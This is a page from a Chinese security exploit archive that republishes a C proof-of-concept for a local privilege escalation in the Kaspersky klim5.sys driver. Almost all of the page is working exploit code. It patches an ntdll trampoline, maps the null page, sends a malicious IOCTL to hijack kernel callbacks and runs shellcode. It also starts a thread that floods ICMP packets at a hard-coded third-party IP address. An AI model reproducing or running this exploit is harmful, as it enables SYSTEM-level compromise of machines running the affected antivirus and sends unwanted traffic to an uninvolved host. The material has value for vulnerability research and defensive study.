首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KIS 2008 and Kaspersky AntiVirus for Workstations local privilege escalation exp
来源:http://www.wintercore.com/ 作者:Ruben 发布时间:2009-02-03  

//// Kaspersky products klim5.sys local privilege escalation
//// ruben@reversemode.com

#include "stdafx.h"

#define BUFFER_SIZE      4

#define MAGIC_IOCTL      0x80052110
#define IMAGEBASE      0x10000

BOOL FlagVulnerable = FALSE;
ULONG_PTR kTrampoline;
ULONG_PTR off1,off2;


typedef DWORD (WINAPI *PNTDELETEKEY)(  IN HANDLE hKey );
typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE               ProcessHandle,
          IN OUT PVOID            *BaseAddress,
          IN ULONG                ZeroBits,
          IN OUT PULONG           RegionSize,
          IN ULONG                AllocationType,
          IN ULONG                Protect );


typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)(   HANDLE IcmpHandle,
                                          HANDLE Event,
                                          FARPROC ApcRoutine,
                                          PVOID ApcContext,
                                          IPAddr DestinationAddress,
                                          LPVOID RequestData,
                                          WORD RequestSize,
                                          PIP_OPTION_INFORMATION RequestOptions,
                                          LPVOID ReplyBuffer,
                                          DWORD ReplySize,
                                          DWORD Timeout);
void WINAPI PacketBombing ()
{
  

 PIcmpSendEcho2     IcmpSendEcho2;
 PIcmpCreateFile    IcmpCreateFile;
 DWORD dwVersion;
 HANDLE             hIcmpFile;
 LPVOID             ReplyBuffer;
 char               *SendData = "Hi!";
 

 dwVersion = GetVersion()&0xFFFF;
 
  if( dwVersion == 0x0005 )
 {
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
             ,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
                                                  ,"IcmpCreateFile");
 }else{

  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
             ,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
                                                 ,"IcmpCreateFile");
 }
 SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);

 hIcmpFile=IcmpCreateFile();
 ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
 
 while(1)
 {
  
  IcmpSendEcho2(hIcmpFile,
       NULL,
       NULL,
       NULL,
       inet_addr("66.102.9.99"), // sorry google :(
       SendData,
       sizeof(SendData),
       NULL,
       ReplyBuffer,
       8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
       1000);
  Sleep(10);
 }
}

_declspec(naked) int ShellCode()
{
 _asm{
  mov eax,[kTrampoline]
  mov [edi+8],eax    ; restore callback
  mov [edi+0xC],eax  ; restore callback #2
  push esi
  mov esi,[off2]
  mov esi,[esi]
  mov esi,[esi]
  mov [esi+8],eax     ; restore callback2
  mov [esi+0xC],eax   ; restore callback2 #2
  pop esi
  mov FlagVulnerable,1
  xor eax,eax
  retn 4
 }
}


 int Callback_Overview()
{
 printf("\n");
 printf("================================================= \n");
 printf("   Kaspersky Products (KIS 2008 && WorkStation) \n");
 printf("   KLim5.sys Local Privilege Escalation Exploit \n");
 printf("================================================= \n");
 printf("   Ruben Santamarta - For educational purposes ONLY \n");
 printf("+ References:\n");
 printf("  www.kaspersky.com\n");
 printf("  wwww.reversemode.com\n\n");
 return 1;
}

int Callback_Direct(char *szInitStr)
{
 PNTALLOCATE        NtAllocateVirtualMemory;
 PNTDELETEKEY NtDeleteKey;
 ULONG_PTR ntJump;
 ULONG_PTR inBuff[BUFFER_SIZE]={0};
 ULONG_PTR BaseNt=0,BaseKlim=0;
 
 LPVOID addr = (LPVOID)3;
 
 DWORD  Offset = 0;
 DWORD  dwShellSize = 0x2000;
 DWORD  oldProt;

 int   i;

 HMODULE  hNtdll;
 HANDLE  hDevice;
 HMODULE  hKernel;
 
 char  szNtos[MAX_PATH]={0};
 char  szKlim[MAX_PATH]={0};

 unsigned char trampoline[]="\x68\x00\x00\x00\x00"
          "\xc3";
 
 Callback_Overview();

 if( GetDriverInfoByName("krnl",szNtos,&BaseNt) )
 {
  printf("[+] %s loaded at   \t [ 0x%p ]\n",szNtos,BaseNt);
  
 } else {
  printf("[!!] Kernel not found :?\n");
  return FALSE;
 }

 if( GetDriverInfoByName("klim5.sys",szKlim,&BaseKlim) )
 {
  printf("[+] %s loaded at   \t [ 0x%p ]\n",szKlim,BaseKlim);
  
 } else {
  printf("[!!] Klim5.sys not found :?\n");
  return FALSE;
 }

 if( strstr(szNtos,"krnlpa") )
 {
  hKernel = LoadLibraryExA("ntkrnlpa.exe",0,1); 
 } else {
  hKernel = LoadLibraryExA("ntoskrnl.exe",0,1);
 } 
 
 
 
 kTrampoline = (ULONG_PTR)GetProcAddress(hKernel,"ExGetSharedWaiterCount");

 for(i=0; i<0x20;i++)
 {
  if( *(WORD*)((BYTE*)kTrampoline+i) == 0x04C2)
  {
   printf("[+] Offset Found : %d \n",i);
   Offset = i;
   break;
  }
 }

 if ( Offset == 0 )
 {
  printf("[+] Offset not found\n");
  exit(0);
 }

 kTrampoline -= ( ULONG_PTR )hKernel;
 kTrampoline += BaseNt;
 kTrampoline += Offset;
 printf("[+] Kernel Mode landing address (ExGetSharedWaiterCount): [ 0x%p ]\n",kTrampoline);

 off1 = BaseKlim + 0x40b0;   // callbacks 1
 off2 = BaseKlim + 0x40a8;   // callbacks 2

 
 hNtdll = GetModuleHandle("ntdll.dll");
 NtDeleteKey = (PNTDELETEKEY)GetProcAddress(hNtdll,"NtDeleteKey");
 Offset = 0;
 for(i=0; i<0x20;i++)
 {
  if( *(WORD*)((BYTE*)NtDeleteKey + i) == 0x04C2)
  {
   printf("[+] Offset Found : %d \n",i);
   Offset = i;
   break;
  }
 }

 if( Offset == 0 )
 {
  printf("[+] Offset not found\n");
  exit(0);
 }
 
 ntJump = (ULONG_PTR)((BYTE*)NtDeleteKey + Offset);
 *(ULONG_PTR*)(trampoline+1)=(ULONG_PTR)ShellCode;

 // Every process except the exploit will execute "retn 4" whilst the exploit
 // jumps to our shellcode. ( ntdll.dll trampoline ). Moreover, by "touching"
 // that page we make sure that it will be IRQL DISPATCH compliant.
 VirtualProtect((LPVOID)NtDeleteKey,0x20,PAGE_EXECUTE_READWRITE,&oldProt);
 memcpy((LPVOID)ntJump ,(LPVOID)trampoline,sizeof(trampoline)-1);
 VirtualProtect((LPVOID)NtDeleteKey,0x20,oldProt,NULL);

 printf("[+] UserMode NtDeleteKey landing/trampoline address: [ 0x%p ]\n",NtDeleteKey);
 
 NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(hNtdll,"NtAllocateVirtualMemory");
 
 if( !NtAllocateVirtualMemory )
 {
  printf("[!!] Unable to resolve NtAllocateVirtualMemory\n");
  return FALSE;
 }


 printf("\n[+] Allocating memory at [ 0x%p ]...",NULL);

 NtAllocateVirtualMemory( INVALID_HANDLE_VALUE,
        &addr,
        0,
        &dwShellSize,
        MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE );

 if( (ULONG_PTR)addr )
 {
  printf("[*] Error allocating memory\n");
  return 0;
 }

 printf("OK");
 
 for(i=0; i < dwShellSize/sizeof(ULONG_PTR); i++)
  *((ULONG_PTR*)addr+i)=kTrampoline;

 printf("\n[+] Checking device...");
 hDevice = OpenDevice(L"\\\\.\\klim5",
      FALSE,
      FALSE,
      FALSE,
      0,
      0);
 
 if( hDevice == INVALID_HANDLE_VALUE )
 {
  printf("Failed!\n");
  return FALSE;
 }
 printf("OK\n");

 DWORD junk;

 
 SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
 
 CreateThread(  NULL,                 
     0,                      
     (LPTHREAD_START_ROUTINE)PacketBombing,     
     (LPVOID)NULL,         
     0,                     
     NULL);

 printf("[+] ShellCode: [ %p ]\n",ShellCode);
 printf("[+] Sending IOCTL...\n");

 // Set the NDIS callback to the Ntdll trampoline
 for(i=0; i<BUFFER_SIZE; i++)
  inBuff[i] = (ULONG_PTR)ntJump; 
 
 DeviceIoControl(hDevice,
     MAGIC_IOCTL,
     (LPVOID)inBuff,BUFFER_SIZE*sizeof(ULONG_PTR),
     NULL,NULL,
     &junk,
     NULL);
 
 

 printf("[+] Waiting for Shellcode execution...");
 Sleep(2000);

 if(FlagVulnerable)
  printf("\n\n[+] Shellcode executed successfully!\n");
 else
  printf("\n\n[**]ERROR: Shellcode not triggered\n");
 
 
 return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenHelpDesk 1.0.100 eval() Co
·CMS from Scratch <= 1.9.1 (fck
·phpslash <= 0.8.1.1 Remote Cod
·Free Download Manager <= 3.0 B
·eVision CMS 2.0 Remote Code Ex
·Euphonics Audio Player v1.0 (.
·CMS Mini <= 0.2.2 Remote Comma
·WEBalbum 2.4b (photo.php id) B
·phpBLASTER 1.0 RC1 (blaster_us
·Hex Workshop v6 (ColorMap file
·RealVNC 4.1.2 (vncviewer.exe)
·TxtBlog 1.0 Alpha Remote Comma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved